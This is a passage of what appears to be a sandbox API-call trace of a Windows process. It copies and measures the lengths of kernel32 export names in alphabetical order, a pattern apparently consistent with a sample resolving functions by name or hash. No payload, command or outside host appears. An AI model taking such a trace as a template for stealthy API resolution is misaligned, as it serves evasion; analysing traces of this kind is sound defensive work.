(lpString="COMPARESTRINGORDINAL") returned 20 [0082.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0082.643] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0082.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0082.643] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0082.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0082.643] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0082.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0082.643] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0082.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0082.643] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0082.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0082.643] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0082.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0082.643] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0082.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0082.643] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0082.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0082.643] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0082.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0082.643] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0082.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0082.643] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0082.643] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0082.643] lstrlenA (lpString="COPYCONTEXT") returned 11 [0082.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0082.644] lstrlenA (lpString="COPYFILEA") returned 9 [0082.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0082.644] lstrlenA (lpString="COPYFILEEXA") returned 11 [0082.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0082.644] lstrlenA (lpString="COPYFILEEXW") returned 11 [0082.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0082.644] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0082.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0082.644] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0082.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0082.644] lstrlenA (lpString="COPYFILEW") returned 9 [0082.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0082.644] lstrlenA (lpString="COPYLZFILE") returned 10 [0082.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0082.644] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0082.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0082.644] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0082.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0082.644] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0082.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0082.644] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0082.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0082.644] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0082.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0082.644] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0082.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0082.644] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0082.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0082.644] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0082.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0082.644] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0082.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0082.644] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0082.644] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0082.644] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0082.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0082.645] lstrlenA (lpString="CREATEEVENTA") returned 12 [0082.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0082.645] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0082.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0082.645] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0082.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0082.645] lstrlenA (lpString="CREATEEVENTW") returned 12 [0082.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0082.645] lstrlenA (lpString="CREATEFIBER") returned 11 [0082.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0082.645] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0082.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0082.645] lstrlenA (lpString="CREATEFILEA") returned 11 [0082.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0082.645] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0082.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0082.645] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0082.645] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0082.646] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0082.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0082.646] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0082.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0082.646] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0082.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0082.646] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0082.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0082.646] lstrlenA (lpString="CREATEFILEW") returned 11 [0082.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0082.646] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0082.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0082.646] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0082.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0082.646] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0082.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0082.646] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0082.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0082.646] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0082.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0082.646] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0082.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0082.646] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0082.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0082.646] lstrlenA (lpString="CREATEJOBSET") returned 12 [0082.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0082.646] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0082.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0082.646] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0082.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0082.646] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0082.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0082.646] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0082.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0082.646] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0082.646] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0082.647] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0082.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0082.647] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0082.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0082.647] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0082.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0082.647] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0082.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0082.647] lstrlenA (lpString="CREATEPIPE") returned 10 [0082.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0082.647] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0082.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0082.647] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0082.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0082.647] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0082.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0082.647] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0082.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0082.647] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0082.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0082.647] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0082.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0082.647] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0082.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0082.647] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0082.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0082.647] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0082.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0082.647] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0082.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0082.647] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0082.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0082.647] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0082.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0082.647] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0082.647] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0082.647] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0082.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0082.648] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0082.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0082.648] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0082.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0082.648] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0082.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0082.648] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0082.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0082.648] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0082.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0082.648] lstrlenA (lpString="CREATETHREAD") returned 12 [0082.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0082.648] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0082.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0082.648] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0082.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0082.648] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0082.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0082.648] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0082.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0082.648] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0082.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0082.648] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0082.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0082.648] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0082.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0082.648] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0082.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0082.648] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0082.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0082.648] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0082.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0082.648] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0082.648] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0082.648] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0082.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0082.649] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0082.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0082.649] lstrlenA (lpString="CTRLROUTINE") returned 11 [0082.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0082.649] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0082.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0082.649] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0082.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0082.649] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0082.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0082.649] lstrlenA (lpString="DEBUGBREAK") returned 10 [0082.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0082.649] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0082.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0082.649] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0082.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0082.649] lstrlenA (lpString="DECODEPOINTER") returned 13 [0082.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0082.649] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0082.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0082.649] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0082.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0082.649] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0082.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0082.649] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0082.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0082.649] lstrlenA (lpString="DELETEATOM") returned 10 [0082.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0082.649] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0082.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0082.649] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0082.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0082.649] lstrlenA (lpString="DELETEFIBER") returned 11 [0082.649] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0082.650] lstrlenA (lpString="DELETEFILEA") returned 11 [0082.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0082.650] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0082.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0082.650] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0082.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0082.650] lstrlenA (lpString="DELETEFILEW") returned 11 [0082.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0082.650] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0082.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0082.650] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0082.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0082.650] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0082.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0082.650] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0082.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0082.650] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0082.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0082.650] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0082.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0082.650] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0082.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0082.650] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0082.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0082.650] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0082.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0082.650] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0082.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0082.650] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0082.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0082.650] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0082.650] lstrcpyA (in: 